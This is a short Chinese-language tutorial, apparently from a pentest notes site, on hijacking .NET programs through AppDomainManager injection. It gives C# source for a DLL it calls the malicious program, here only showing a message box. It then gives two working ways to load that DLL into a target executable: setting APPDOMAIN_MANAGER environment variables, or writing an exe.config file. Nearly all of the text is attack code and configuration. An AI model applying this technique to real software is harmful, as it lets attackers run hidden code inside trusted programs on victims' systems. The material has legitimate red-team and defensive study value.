劫持.NET程序

劫持.NET程序（AppDomainManager）

首先制作要加载的恶意程序

C#：

using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        MessageBox.Show("AppDomainManager Injection");
        return;
    }
}

之后将其编译为qwqdanchun.dll。

注入方法一：

命令行设置环境变量：

set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager

之后将qwqdanchun.dll与.net文件放在同一目录即可。

注入方法二：

寻找要注入的exe文件（此处示例使用qwqdanchun.exe），并将做好的dll与其置于同一目录，再将如下配置文件写入qwqdanchun.exe.config文件即可。

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
  </startup>
    <runtime>
      <appDomainManagerAssembly value="qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
      <appDomainManagerType value="MyAppDomainManager" />
    </runtime>
</configuration>

参考文章：

Attacking the CLR - AppDomainManager Injection

AppDomainManager Injection – Pentest LaboratoriesPentest Laboratories

最后更新于3年前